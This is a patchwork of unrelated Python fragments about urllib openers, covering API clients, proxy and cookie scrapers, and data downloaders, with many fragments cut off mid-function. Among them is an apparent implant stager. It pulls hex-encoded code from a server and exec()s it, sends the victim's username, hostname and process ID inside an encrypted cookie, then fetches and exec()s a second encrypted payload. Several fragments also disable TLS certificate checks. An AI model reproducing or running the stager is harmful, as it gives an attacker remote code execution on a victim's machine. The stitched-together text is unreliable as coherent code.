            r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.'
            r'(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)',
            content)
        myip = m.group(0)
        return myip if len(myip) > 0 else ''
    except Exception:
        return ''
    finally:
        if url:
            url.close()
def metricCollector():
    data = {}
    # defaults
    data['plugin_version'] = PLUGIN_VERSION
    data['heartbeat_required'] = HEARTBEAT
    data['units'] = METRICS_UNITS

    URL = "http://" + COUCHDB_HOST + ":" + COUCHDB_PORT + COUCHDB_STATS_URI

    try:
        if COUCHDB_USERNAME and COUCHDB_PASSWORD:
            password_mgr = connector.HTTPPasswordMgrWithDefaultRealm()
            password_mgr.add_password(REALM, URL, COUCHDB_USERNAME, COUCHDB_PASSWORD)
            auth_handler = connector.HTTPBasicAuthHandler(password_mgr)
            opener = connector.build_opener(auth_handler)
            connector.install_opener(opener)
        response = connector.urlopen(URL, timeout=10)
        byte_responseData = response.read()
        str_responseData = byte_responseData.decode('UTF-8')
        couch_dict = json.loads(str_responseData)
        for attribute, attribute_value in couch_dict.items():
            for metric, val in attribute_value.items():
                if 'current' in val and val['current'] is not None:
                    if metric in METRICS_KEY_VS_NAME:
                        metric = METRICS_KEY_VS_NAME[metric]
                    data[metric] = val['current']
    except Exception as e:
        data['status'] = 0
        data['msg'] = str(e)
    return data
def basic_auth_opener(url, username, password):
    password_manager = HTTPPasswordMgrWithDefaultRealm()
    password_manager.add_password(None, url, username, password)
    auth_handler = PreemptiveBasicAuthHandler(password_manager)
    opener = build_opener(auth_handler)
    return opener
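# A usage sketch; PreemptiveBasicAuthHandler is assumed to be defined
# elsewhere in this module (urllib.request only ships HTTPBasicAuthHandler,
# which waits for a 401 challenge before sending credentials). The URL and
# credentials are placeholders.
# opener = basic_auth_opener('http://example.com/api', 'user', 'secret')
# print(opener.open('http://example.com/api/status').read())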
def __api_request(self, query):
    # type=keygen request will urlencode key if needed so don't
    # double encode
    if 'key' in query:
        query2 = query.copy()
        key = query2['key']
        del query2['key']
        data = urlencode(query2)
        data += '&' + 'key=' + key
    else:
        data = urlencode(query)
    self._log(DEBUG3, 'query: %s', query)
    self._log(DEBUG3, 'data: %s', type(data))
    self._log(DEBUG3, 'data.encode(): %s', type(data.encode()))

    url = self.uri
    if self.use_get:
        url += '?' + data
        request = Request(url)
    else:
        # data must be type 'bytes' for 3.x
        request = Request(url, data.encode())

    self._log(DEBUG1, 'URL: %s', url)
    self._log(DEBUG1, 'method: %s', request.get_method())
    self._log(DEBUG1, 'data: %s', data)

    kwargs = {
        'url': request,
    }

    if (sys.version_info.major == 2 and sys.hexversion >= 0x02070900 or
            sys.version_info.major == 3 and sys.hexversion >= 0x03040300):
        # see PEP 476; urlopen() has context
        if self.ssl_context is None:
            # don't perform certificate verification
            kwargs['context'] = ssl._create_unverified_context()
        else:
            kwargs['context'] = self.ssl_context
    elif self.ssl_context is not None:
        https_handler = HTTPSHandler(context=self.ssl_context)
        opener = build_opener(https_handler)
        install_opener(opener)

    if self.timeout is not None:
        kwargs['timeout'] = self.timeout

    try:
        response = urlopen(**kwargs)
    # XXX handle httplib.BadStatusLine when http to port 443
    except URLError as error:
        msg = 'URLError:'
        if hasattr(error, 'code'):
            msg += ' code: %s' % error.code
        if hasattr(error, 'reason'):
            msg += ' reason: %s' % error.reason
        if not (hasattr(error, 'code') or hasattr(error, 'reason')):
            msg += ' unknown error (Kevin heart Python)'
        self.status_detail = msg
        return False

    self._log(DEBUG2, 'HTTP response headers:')
    self._log(DEBUG2, '%s', response.info())

    return response
from urllib.request import Request, ProxyHandler, build_opener
from fake_useragent import UserAgent

url = "http://httpbin.org/get"
headers = {"User-Agent": UserAgent().chrome}
request = Request(url, headers=headers)

handler = ProxyHandler({"http": "182.46.251.27:9999"})
opener = build_opener(handler)
response = opener.open(request)
print(response.read().decode())
while True:
    province_list = ['北京市', '天津市', '上海市', '重庆市', '河北省', '山西省', '辽宁省', '吉林省',
                     '黑龙江省', '江苏省', '浙江省', '安徽省', '福建省', '江西省', '山东省', '河南省',
                     '湖北省', '湖南省', '广东省', '海南省', '四川省', '贵州省', '云南省', '陕西省',
                     '甘肃省', '青海省', '台湾省', '内蒙古自治区', '广西壮族自治区', '西藏自治区',
                     '宁夏回族自治区', '新疆维吾尔自治区', '香港特别行政区', '澳门特别行政区']
    currentTime = datetime.now()
    time_str = currentTime.strftime("%Y-%m-%d-%H-%M-%S")
    print("crawl {}...".format(time_str))
    for province in province_list:
        for proxy_url in proxy_list:
            try:
                print("try download {} ...".format(proxy_url))
                if proxy_url != 'no':
                    # create the proxy handler, assign it to a variable
                    proxy = urlrequest.ProxyHandler({'https': proxy_url})
                    # construct a new opener using your proxy settings
                    opener = urlrequest.build_opener(proxy)
                else:
                    opener = urlrequest.build_opener()
                opener.addheaders = [('User-Agent',
                                      'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30')]
                # install the opener on the module level
                urlrequest.install_opener(opener)

                print(province, "...")
                day_str = currentTime.strftime("%Y-%m-%d")
                directory = './{}/{}'.format(province, day_str)
                if not os.path.exists(directory):
                    os.makedirs(directory)
                filter_str = ('{"ProvinceName":"' + province + '","RegionName":"",'
                              '"KeyWord":"","Visible":"1","page":1,"rows":2000,'
                              '"Type":"","StaOpState":"3"}')
                params = urllib.parse.urlencode({'filter': filter_str}).encode('ascii')
                country_all_url = "https://csm.teld.cn/api/invoke?SID=CSM-GetStationInfoByFilter"
def run_query(search_terms):
    bing_api_key = read_bing_key()
    if not bing_api_key:
        raise KeyError('Bing Key Not Found')

    # Specify the base url and the service (Bing Search API 2.0)
    root_url = 'https://api.datamarket.azure.com/Bing/Search/'
    service = 'Web'

    # Specify how many results we wish to be returned per page.
    # Offset specifies where in the results list to start from.
    # With results_per_page = 10 and offset = 11, this would start from page 2.
    results_per_page = 10
    offset = 0

    # Wrap quotes around our query terms as required by the Bing API.
    # The query we will then use is stored within variable query.
    query = "'{0}'".format(search_terms)

    # Turn the query into an HTML encoded string.
    # We use urllib for this - differences exist between Python 2 and 3.
    # The try/except blocks are used to determine which function call works.
    # Replace this try/except block with the relevant import and query
    # assignment.
    try:
        from urllib import parse  # Python 3 import.
        query = parse.quote(query)
    except ImportError:  # If the import above fails, you are running Py 2.7.x.
        from urllib import quote
        query = quote(query)

    # Construct the latter part of our request's URL.
    # Sets the format of the response to JSON and sets other properties.
    search_url = "{0}{1}?$format=json&$top={2}&$skip={3}&Query={4}".format(
        root_url, service, results_per_page, offset, query)

    # Setup authentication with the Bing servers.
    # The username MUST be a blank string, and put in your API key!
    username = ''
    # headers = {'Authorization' : 'Basic {0}'.format(b64encode(bing_api_key))}

    # Create a 'password manager' which handles authentication for us.
    try:
        from urllib import request  # Python 3 import.
        password_mgr = request.HTTPPasswordMgrWithDefaultRealm()
    except ImportError:  # Running Python 2.7.x - import urllib2 instead.
        import urllib2
        password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()

    password_mgr.add_password(None, search_url, username, bing_api_key)

    # Create our results list which we'll populate.
    results = []

    try:
        # Prepare for connecting to Bing's servers.
        try:  # Python 3.5 and 3.6
            handler = request.HTTPBasicAuthHandler(password_mgr)
            opener = request.build_opener(handler)
            request.install_opener(opener)
        except UnboundLocalError:  # Python 2.7.x
            handler = urllib2.HTTPBasicAuthHandler(password_mgr)
            opener = urllib2.build_opener(handler)
            urllib2.install_opener(opener)

        # Connect to the server and read the response generated.
        try:  # Python 3.5 or 3.6
            response = request.urlopen(search_url).read()
            response = response.decode('utf-8')
        except UnboundLocalError:  # Python 2.7.x
            response = urllib2.urlopen(search_url).read()

        # Convert the string response to a Python dictionary object.
        json_response = json.loads(response)

        # Loop through each page returned, populating out results list.
        for result in json_response['d']['results']:
            results.append({
                'title': result['Title'],
                'link': result['Url'],
                'summary': result['Description']
            })
    except:
        print("Error when querying the Bing API")

    # Return the list of results to the calling function.
    return results
from urllib.request import HTTPPasswordMgrWithDefaultRealm, HTTPBasicAuthHandler, build_opener
from urllib.error import URLError

username = '******'
password = 'password'
url = 'http://localhost:5000/'

p = HTTPPasswordMgrWithDefaultRealm()
p.add_password(None, url, username, password)

auth_handler = HTTPBasicAuthHandler(p)
opener = build_opener(auth_handler)

try:
    result = opener.open(url)
    html = result.read().decode('utf-8')
    print(html)
except URLError as e:
    print(e.reason)
cstr = time.strftime("%Y-%m-%d", time.gmtime())
cstr = time.strptime(cstr, "%Y-%m-%d")

# This doesn't exist in python < 2.7.9
if sys.version_info[0] == 3 or (sys.version_info[0] == 2 and
                                sys.version_info[1] >= 7 and
                                sys.version_info[2] >= 9):
    ssl._create_default_https_context = ssl._create_unverified_context

if hh[0]:
    r = urllib2.Request(url, headers={'Host': hh[0], 'User-agent': ua})
else:
    r = urllib2.Request(url, headers={'User-agent': ua})
res = urllib2.urlopen(r)
d = res.read()

try:
    b = bytes.fromhex(d[1:].decode("utf-8")).decode("utf-8")
    s = hashlib.sha512(b.encode("utf-8")).hexdigest()
except:
    c = d[1:]
    b = c.decode("hex")
    s = hashlib.sha512(b).hexdigest()

if pykey in b and pyhash == s and cstr < kdn:
    try:
        exec(bytes.fromhex(d[1:].decode("utf-8")).decode("utf-8"))
    except:
        exec(b)
else:
    sys.exit(0)

un = pwd.getpwuid(os.getuid())[0]
pid = os.getpid()
pname = "NA"
is64 = sys.maxsize > 2**32
arch = ('x64' if is64 == True else 'x86')
hn = socket.gethostname()
o = urllib2.build_opener()
encsid = encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un, hn, hn, arch, pid, pname, urlid))

if hh[0]:
    headers = {'Host': hh[0], 'User-Agent': ua,
               'Cookie': 'SessionID=%s' % encsid.decode("utf-8")}
else:
    headers = {'User-Agent': ua, 'Cookie': 'SessionID=%s' % encsid.decode("utf-8")}
request = urllib2.Request(url2, headers=headers)
response = urllib2.urlopen(request)
html = response.read().decode('utf-8')
x = decrypt(key, html)
exec(base64.b64decode(x))

un = pwd.getpwuid(os.getuid())[0]
pid = os.getpid()
procname = "python"
is64 = sys.maxsize > 2**32
arch = ('x64' if is64 == True else 'x86')
hn = socket.gethostname()
o = urllib2.build_opener()
encsid = encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un, hn, hn, arch, pid, procname, urlid))

if hh[0]:
    r = urllib2.Request(url2, headers={'Host': hh[0], 'User-agent': ua,
                                       'Cookie': 'SessionID=%s' % encsid})
else:
    r = urllib2.Request(url2, headers={'User-agent': ua,
                                       'Cookie': 'SessionID=%s' % encsid})
res = urllib2.urlopen(r)
html = res.read()
x = decrypt(key, html).rstrip('\0')
exec(base64.b64decode(x))
def opener(self):
    if DEBUG:
        return urllib.build_opener(urllib.HTTPSHandler(debuglevel=1))
    else:
        return urllib.build_opener()
def build_opener():
    """Build an opener whose CookieJar keeps cookies across requests."""
    cookie = CookieJar()
    cookie_handler = ur.HTTPCookieProcessor(cookie)
    opener = ur.build_opener(cookie_handler)
    return opener
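# A usage sketch: cookies set by the first response are stored in the jar and
# sent automatically on later requests made through the same opener. The URLs
# are placeholders.
# opener = build_opener()
# opener.open('http://example.com/login')    # server sets a session cookie
# opener.open('http://example.com/profile')  # cookie is sent back automatically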
# Download link
LavFilters = "https://github.com/Nevcairiel/LAVFilters/releases/download/0.74.1/LAVFilters-0.74.1-Installer.exe"

# 64 Bits
if platform.machine().endswith('64'):
    FFMPEG = "https://ffmpeg.zeranoe.com/builds/win64/static/ffmpeg-20190502-7eba264-win64-static.zip"
# 32 Bits
else:
    FFMPEG = "https://ffmpeg.zeranoe.com/builds/win32/static/ffmpeg-20190502-7eba264-win32-static.zip"

DemGlobal = "http://www.gisandbeers.com/RRSS/Cartografia/ETOPO1.zip"

progress = QProgressBar()
progress.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)

opener = build_opener()
opener.addheaders = [(
    'User-Agent',
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36'
)]
install_opener(opener)


def reporthook(blocknum, blocksize, totalsize):
    ''' Url retrieve progress '''
    readsofar = blocknum * blocksize
    if totalsize > 0:
        percent = readsofar * 1e2 / totalsize
        progress.setValue(int(percent))
from urllib.error import URLError
from urllib.request import ProxyHandler, build_opener

proxy_handler = ProxyHandler({
    'http': 'http://127.0.0.1:9743',
    'https': 'https://127.0.0.1:9743'
})
opener = build_opener(proxy_handler)
try:
    response = opener.open('https://www.baidu.com')
    print(response.read().decode('utf-8'))
except URLError as e:
    print(e.reason)
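# A variant sketch for a proxy that requires credentials: urllib accepts them
# inline in the proxy URL (user:password@host:port). Host, port, and
# credentials here are placeholders, not values from the original snippet.
auth_proxy_handler = ProxyHandler({
    'http': 'http://user:secret@127.0.0.1:9743',
    'https': 'https://user:secret@127.0.0.1:9743'
})
auth_opener = build_opener(auth_proxy_handler)
# auth_opener.open('https://www.baidu.com') would send requests via the proxy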
def get_modisfiles(username, password, platform, product, year, tile, proxy,
                   doy_start=1, doy_end=-1,
                   base_url="https://e4ftl01.cr.usgs.gov", out_dir=".",
                   ruff=False, get_xml=False, verbose=False):
    """Download MODIS products for a given tile, year & period of interest

    This function uses the `urllib2` module to download MODIS "granules"
    from the USGS website. The approach is based on downloading the index
    files for any date of interest, and parsing the HTML (rudimentary
    parsing!) to search for the relevant filename for the tile the user is
    interested in. This file is then downloaded in the directory specified
    by `out_dir`.

    The function also checks to see if the selected remote file exists
    locally. If it does, it checks that the remote and local file sizes are
    identical. If they are, the file isn't downloaded, but if they are
    different, the remote file is downloaded.

    Parameters
    ----------
    username: str
        The EarthData username string
    password: str
        The EarthData password string
    platform: str
        One of three: MOLA, MOLT MOTA
    product: str
        The product name, such as MOD09GA.005 or MYD15A2.005. Note that
        you need to specify the collection number (005 in the examples)
    year: int
        The year of interest
    tile: str
        The tile (e.g., "h17v04")
    proxy: dict
        A proxy definition, such as {'http': 'http://127.0.0.1:8080', 'ftp': ''}, etc.
    doy_start: int
        The starting day of the year.
    doy_end: int
        The ending day of the year.
    base_url: str, url
        The URL to use. Shouldn't be changed, unless USGS change the server.
    out_dir: str
        The output directory. Will be created if it doesn't exist
    ruff: Boolean
        Check to see what files are already available and download them
        without testing for file size etc.
    verbose: Boolean
        Whether to sprout lots of text out or not.
    get_xml: Boolean
        Whether to get the XML metadata files or not. Someone uses them,
        apparently ;-)

    Returns
    -------
    Nothing
    """
    if proxy is not None:
        proxy = urllib2.ProxyHandler(proxy)
        opener = urllib2.build_opener(proxy)
        urllib2.install_opener(opener)

    if not os.path.exists(out_dir):
        if verbose:
            logger.info("Creating output dir %s" % out_dir)
        os.makedirs(out_dir)
    if doy_end == -1:
        if calendar.isleap(year):
            doy_end = 367
        else:
            doy_end = 366

    dates = [time.strftime("%Y.%m.%d",
                           time.strptime("%d/%d" % (i, year), "%j/%Y"))
             for i in range(doy_start, doy_end)]
    url = "%s/%s/%s/" % (base_url, platform, product)
    dates = parse_modis_dates(url, dates, product, out_dir, ruff=ruff)
    # Only use the latest date from the range
    if len(dates) > 1:
        dates = [dates[-1]]
    them_urls = []
    res = []
    for date in dates:
        r = requests.get("%s%s" % (url, date), verify=False)
        for line in r.text.split("\n"):
            if line.find(tile) >= 0:
                if line.find(".hdf") >= 0:
                    fname = line.split("href=")[1].split(">")[0].strip('"')
                    if fname.endswith(".hdf.xml") and not get_xml:
                        pass
                    else:
                        fpath = os.path.join(out_dir, fname)
                        res.append(fpath)
                        if not os.path.exists(fpath):
                            them_urls.append("%s/%s/%s" % (url, date, fname))
                        else:
                            if verbose:
                                logger.info("File %s already present. Skipping" % fname)
    with requests.Session() as s:
        s.auth = (username, password)
        for the_url in them_urls:
            r1 = s.request('get', the_url)
            r = s.get(r1.url, stream=True)
            if not r.ok:
                raise IOError("Can't start download... [%s]" % the_url)
            file_size = int(r.headers['content-length'])
            fname = the_url.split("/")[-1]
            fpath = os.path.join(out_dir, fname)
            logger.info("Starting download on %s(%d bytes) ..."
                        % (fpath, file_size))
            with open(fpath, 'wb') as fp:
                for chunk in r.iter_content(chunk_size=CHUNKS):
                    if chunk:
                        fp.write(chunk)
                        fp.flush()
                        os.fsync(fp)
            if verbose:
                logger.info("\tDone!")
    if verbose:
        logger.info("Completely finished downloading all there was")
    return res
def all_games_account():
    # API Model
    api_return = {
        'QueryStatus': {
            'error': False,
            'error_message': ''
        },
        'Account': {
            'user_64id': '0',
            'user_persona': 'test_user',
            'user_realname': 'Test User',
            'user_country': 'XX',
            'user_state': 'XX',
            'user_cityid': 'XX',
            'user_primary_group': '',
            'user_avatar_small': '',
            'user_avatar_medium': '',
            'user_avatar_large': '',
            'user_account_link': '',
            'account_public': '',
            'account_creation_datetime': '',
            'current_status': '',
            'current_app_id': '',
            'current_app_title': '',
            'last_logoff_datetime': '',
            'UserApps': {
                'app_count': '',
                'Apps': []
            }
        }
    }

    # Get account's gamelist
    user_games_page = json.load(urllib2.build_opener().open(
        urllib2.Request('http://api.steampowered.com/ISteamApps/GetAppList/v2/')))
    for x in user_games_page['response']['games']:
        app_data = get_app_data(x['appid'])
        if app_data['missing'] == True:
            app_data = {
                'missing': True,
                'app_id': str(x['appid']),
                'minutes_played': x['playtime_forever']
            }
            app_data['hours_played'] = math.ceil(
                (float(app_data['minutes_played']) / 60) * 100.0) / 100.0
        else:
            app_data['genres'] = get_app_genres(x['appid'])
            app_data['developers'] = get_app_developers(x['appid'])
            app_data['publishers'] = get_app_publishers(x['appid'])
            app_data['languages'] = get_app_languages(x['appid'])
            if app_data['size_mb'] > 0:
                app_data['size_gb'] = math.ceil(
                    (float(app_data['size_mb']) / 1000) * 10.0) / 10.0
            else:
                app_data['size_mb'] = 0
                app_data['size_gb'] = 0
            app_data['minutes_played'] = 42
            app_data['hours_played'] = math.ceil(
                (float(app_data['minutes_played']) / 60) * 100.0) / 100.0
            # Figure out price/hours ratio
            if app_data['hours_played'] >= 1 and \
                    app_data['store_price_default_usd'] is not None:
                app_data['price_hours'] = math.ceil(
                    float(app_data['store_price_default_usd'] /
                          app_data['hours_played']) * 100.0) / 100.0
            else:
                app_data['price_hours'] = ''
        api_return['Account']['UserApps']['Apps'].append(app_data)

    api_return['Account']['UserApps']['app_count'] = len(
        api_return['Account']['UserApps']['Apps'])
    return api_return
from urllib import request, parse
from http import cookiejar

# create a CookieJar instance
cookie = cookiejar.CookieJar()
# build the cookie handler
cookie_handler = request.HTTPCookieProcessor(cookie)
# create the http request handler
http_handler = request.HTTPHandler()
# create the https handler
https_handler = request.HTTPSHandler()
# build the request opener
opener = request.build_opener(http_handler, https_handler, cookie_handler)


def login():
    '''
    Handles the initial login.
    Requires the username and password, used to obtain the login cookie.
    :return:
    '''
    # this url needs to be taken from the login form's action attribute
    url = "http://www.renren.com/PLogin.do"
    # these keys need to be taken from the name attributes of the two
    # corresponding inputs in the login form
    data = {"email": "13119144223", "password": "******"}
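# A sketch of how login() would typically continue, assuming the module-level
# opener above: the form dict is URL-encoded to bytes for the POST body, and
# the session cookie from the response lands in the CookieJar automatically.
#     req = request.Request(url, data=parse.urlencode(data).encode('utf-8'))
#     rsp = opener.open(req)
#     print(rsp.read().decode('utf-8'))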
def get_opener(self):
    cookiejar = CookieJar()
    handler = request.HTTPCookieProcessor(cookiejar)
    opener = request.build_opener(handler)
    return opener
MODULE_PATH = os.path.dirname(os.path.abspath(__file__))
MODULE_NAME = os.path.join(MODULE_PATH, '_data.py')
MODULE_ETAG = os.path.join(MODULE_PATH, '_data.etag')

# Maximum file age to accept without checking for a newer version
MAX_AGE_SEC = 86400

# Get the current file age and entity tag (if it exists)
age = 1e6
etag = ''
if os.path.exists(MODULE_NAME):
    age = time.time() - os.path.getmtime(MODULE_NAME)
    if os.path.exists(MODULE_ETAG):
        with open(MODULE_ETAG, 'r') as fh:
            etag = fh.read()

# If the file is more than MAX_AGE_SEC old, check for an update
if age > MAX_AGE_SEC:
    request = urlrequest.Request(MODULE_URL)
    opener = urlrequest.build_opener()
    data = opener.open(request)
    if data.headers['etag'] != etag:
        with open(MODULE_NAME, 'wb') as fh:
            fh.write(data.read())
        with open(MODULE_ETAG, 'w') as fh:
            fh.write(data.headers['etag'])

# Load in everything from the module
from _data import *
from _data import __all__
def __init__(self):
    """Initialize Token Resolver class"""
    self._proxies = get_proxies()
    install_opener(build_opener(ProxyHandler(self._proxies)))
def __init__(self, url):
    self.opener = req.build_opener(req.HTTPCookieProcessor())
    self.open(url)
import xml.sax.saxutils as _saxutils

import feedparser as _feedparser
import html2text as _html2text

from . import __url__
from . import __version__
from . import LOG as _LOG
from . import config as _config
from . import email as _email
from . import error as _error
from . import util as _util


_USER_AGENT = 'rss2email/{} ({})'.format(__version__, __url__)
_feedparser.USER_AGENT = _USER_AGENT
_urllib_request.install_opener(_urllib_request.build_opener())

_SOCKET_ERRORS = []
for e in ['error', 'herror', 'gaierror']:
    if hasattr(_socket, e):
        _SOCKET_ERRORS.append(getattr(_socket, e))
del e  # cleanup namespace
_SOCKET_ERRORS = tuple(_SOCKET_ERRORS)

# drv_libxml2 raises:
#   TypeError: 'str' does not support the buffer interface
_feedparser.PREFERRED_XML_PARSERS = []


class Feed(object):
    """Utility class for feed manipulation and storage.
def __init__(self, address, timeout=5, proxy_opener=None,
             allow_permutations=False):

    # IPv4Address or IPv6Address
    if isinstance(address, IPv4Address) or isinstance(address, IPv6Address):
        self.address = address
    else:
        # Use ipaddress package exception handling.
        self.address = ip_address(address)

    # Default timeout for socket connections.
    self.timeout = timeout

    # Allow other than DNS lookups for ASNs.
    self.allow_permutations = allow_permutations

    if self.allow_permutations:
        from warnings import warn
        warn('allow_permutations has been deprecated and will be removed. '
             'It is no longer needed, due to the deprecation of asn_alts, '
             'and the addition of the asn_methods argument.')

    self.dns_resolver = dns.resolver.Resolver()
    self.dns_resolver.timeout = timeout
    self.dns_resolver.lifetime = timeout

    # Proxy opener.
    if isinstance(proxy_opener, OpenerDirector):
        self.opener = proxy_opener
    else:
        handler = ProxyHandler()
        self.opener = build_opener(handler)

    # IP address in string format for use in queries.
    self.address_str = self.address.__str__()

    # Determine the IP version, 4 or 6
    self.version = self.address.version

    if self.version == 4:
        # Check if no ASN/whois resolution needs to occur.
        is_defined = ipv4_is_defined(self.address_str)
        if is_defined[0]:
            raise IPDefinedError(
                'IPv4 address {0} is already defined as {1} via '
                '{2}.'.format(self.address_str, is_defined[1], is_defined[2]))
        # Reverse the IPv4Address for the DNS ASN query.
        split = self.address_str.split('.')
        split.reverse()
        self.reversed = '.'.join(split)
        self.dns_zone = IPV4_DNS_ZONE.format(self.reversed)
    else:
        # Check if no ASN/whois resolution needs to occur.
        is_defined = ipv6_is_defined(self.address_str)
        if is_defined[0]:
            raise IPDefinedError(
                'IPv6 address {0} is already defined as {1} via '
                '{2}.'.format(self.address_str, is_defined[1], is_defined[2]))
        # Explode the IPv6Address to fill in any missing 0's.
        exploded = self.address.exploded
        # Cymru seems to timeout when the IPv6 address has trailing '0000'
        # groups. Remove these groups.
        groups = exploded.split(':')
        for index, value in reversed(list(enumerate(groups))):
            if value == '0000':
                del groups[index]
            else:
                break
        exploded = ':'.join(groups)
        # Reverse the IPv6Address for the DNS ASN query.
        val = str(exploded).replace(':', '')
        val = val[::-1]
        self.reversed = '.'.join(val)
        self.dns_zone = IPV6_DNS_ZONE.format(self.reversed)
    if not path.exists(directory):
        makedirs(directory)
    name = directory + '/' + url.replace('/', '') + '.jpg'
    try:
        urlretrieve(url, name)
    except HTTPError:
        return 1
    print('Images saved successfully.')
    return 0


def load_proxies(input_file):
    with open(input_file, "r") as Fi:
        proxies = set(Fi.readlines())
    return proxies


if __name__ == '__main__':
    url_first = '1'
    counter = 1
    # set_proxies = load_proxies(input_file='proxies_good.txt')
    proxy = ProxyHandler({'http': '167.249.248.122:33865'})
    opener = build_opener(proxy)
    install_opener(opener)
    while True:
        url_now = url_first.replace('/1.jpg', '/' + str(counter) + '.jpg')
        # pass the per-iteration URL, not the template, to the saver
        if img_saver(url_now) == 1:
            break
        sleep(3)
        counter += 1
url = "http://www.qishu.cc/kehuan/list6_%s.html" url = "http://www.qishu.cc/chuanyeu/list7_%s.html" url = "http://www.qishu.cc/wangyou/list8_%s.html" url = "http://www.qishu.cc/lishi/list9_%s.html" url = "http://www.qishu.cc/xiaoyuan/list5_%s.html" url = "http://www.qishu.cc/yanqing/list10_%s.html" url = "http://www.qishu.cc/wenxue/list11_%s.html" user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ' \ 'Chrome/64.0.3282.119 Safari/537.36 ' head = {'User-Agnet': user_agent, 'Connection': 'keep-alive'} data = {'a': '1'} postData = parse.urlencode(data).encode('utf-8') cookie = cookiejar.CookieJar() cookie_support = request.HTTPCookieProcessor(cookie) opener = request.build_opener(cookie_support) for i in range(1, 13): page = url % i f.writelines("--- %s" % page) print(page) f.write("\n") req1 = request.Request(url=page, data=postData, headers=head, method='GET') response1 = opener.open(req1) html = response1.read() # print(html) html = html.decode('GB18030') get_names(html) f.flush()
            req.full_url, 404, str(reason),
            message_from_string('content-type: text/plain'), BytesIO())
    elif isinstance(reason, IsADirectoryError):
        # Emulate the way a web server handles directories.
        if path.endswith('/'):
            req.full_url = f'file://{path}index.html'
            return self.file_open(req)
        # Redirect to add trailing slash.
        raise HTTPError(
            req.full_url + '/', 301, 'Path is a directory',
            message_from_string('content-type: text/plain'), BytesIO())
    else:
        raise


_URL_OPENER = build_opener(_CustomRedirectHandler, _CustomFileHandler)


def open_page(url: str,
              ignore_client_error: bool = False,
              accept_header: str = '*/*') -> addinfourl:
    """Open a connection to retrieve a resource via HTTP GET.

    @param url: The URL of the resource to request.
    @param ignore_client_error: If C{True}, a client error (HTTP status 400)
        is not reported as an error. This is useful to avoid false positives
        when making speculative requests.
    @param accept_header: HTTP C{Accept} header to use for the request.
#!/usr/bin/env python
#coding=utf-8
import urllib.request as urllib2  # a neat trick to import urllib2 under python3
import simplejson

data = simplejson.dumps({
    'text': '''Some long text here...''',
    'language': 'english',
    'passphrase': '...passphrase...',
    'simple_maths_n': 10,
    'attribute': 'word',
    'exclude_stop_words': True,
    'alphanumeric': True,
    'one_alphabetic': True,
    'min_length': 3,
    'max_keywords': 10,
    'min_frequency': 5
})

# POST data must be bytes under Python 3
req = urllib2.Request("https://beta.sketchengine.co.uk/get_keywords/",
                      data.encode('utf-8'))
opener = urllib2.build_opener()
f = opener.open(req)
obj = simplejson.load(f)

if obj.get('error') == '':
    print('Length:', obj.get('length', 0))
    print('Reference corpus:', obj.get('ref_corp', ''))
    for k in obj.get('keywords', []):
        print('%s\t%d\t%f' % tuple(k))
else:
    print('Error encountered:', obj.get('error'))
The first POST obtains the cookie, which is carried on every later request;
that cookie can then be used to visit other pages.
"""
from urllib import request, parse
from http import cookiejar

# cookie
cookie = cookiejar.CookieJar()
# handler
cookie_handler = request.HTTPCookieProcessor(cookiejar=cookie)

opener = request.build_opener(cookie_handler)
opener.addheaders = [(
    "User-Agent",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36"
)]

data = {
    "email": "",
    "password": "",
}
data_encode = parse.urlencode(data)

url = "http://www.renren.com/PLogin.do"
req = request.Request(url, data=str.encode(data_encode))
def send(i):
    """
    Input:  {
              action [str]     - remote API action name
              config [dict]    - configuration for remote server
              dict [dict]      - dict to send to remote server
              ownership [dict] - info about user ownership
            }

    Output: {
              return [int]     - return code = 0 if success or >0 if error
              (error) [str]    - error string if return>0
            }
    """

    # Import modules compatible with Python 2.x and 3.x
    import urllib

    try:
        import urllib.request as urllib2
    except:
        import urllib2

    try:
        from urllib.parse import urlencode
    except:
        from urllib import urlencode

    # Get server and user config
    config = i.get('config', {})

    username = config.get('username', '')
    # if username=='' or username==None:
    #     return {'return':1, 'error':'Username is not defined'}

    api_key = config.get('api_key', '')
    # if api_key=='' or api_key==None:
    #     return {'return':1, 'error': 'API key is not defined'}

    url = config.get('server_url')
    if url == '' or url == None:
        return {'return': 1, 'error': 'cK API URL is not defined'}

    remote_server_user = config.get('server_user')
    if remote_server_user == None:
        remote_server_user = ''

    remote_server_password = config.get('server_pass')
    if remote_server_password == None:
        remote_server_password = ''

    remote_skip_certificate_validation = config.get('server_skip_validation')
    if remote_skip_certificate_validation == None:
        remote_skip_certificate_validation = ''

    # Prepare dict to send to remote server
    ii = {}
    ii['action'] = i.get('action', '')
    ii['dict'] = i.get('dict', {})
    ii['ownership'] = i.get('ownership', {})
    ii['username'] = username
    ii['api_key'] = api_key

    # Prepare post variables
    r = ck.dumps_json({'dict': ii, 'skip_indent': 'yes'})
    if r['return'] > 0:
        return r

    s = r['string']
    if sys.version_info[0] > 2:
        s = s.encode('utf8')

    # Check if skip SSL certificate
    ctx = None
    add_ctx = False
    if remote_skip_certificate_validation == 'yes':
        import ssl
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        add_ctx = True

    # If auth
    auth = None
    add_auth = False
    if remote_server_user != '' and remote_server_user != None:
        if remote_server_password == None:
            remote_server_password = ''
        auth = urllib2.HTTPPasswordMgrWithDefaultRealm()
        auth.add_password(None, url, remote_server_user, remote_server_password)
        add_auth = True

    # Prepare handler (TBD: maybe there is another, more elegant way?)
    if add_auth and add_ctx:
        urllib2.install_opener(
            urllib2.build_opener(urllib2.HTTPBasicAuthHandler(auth),
                                 urllib2.HTTPSHandler(context=ctx)))
    elif add_auth:
        urllib2.install_opener(
            urllib2.build_opener(urllib2.HTTPBasicAuthHandler(auth)))
    elif add_ctx:
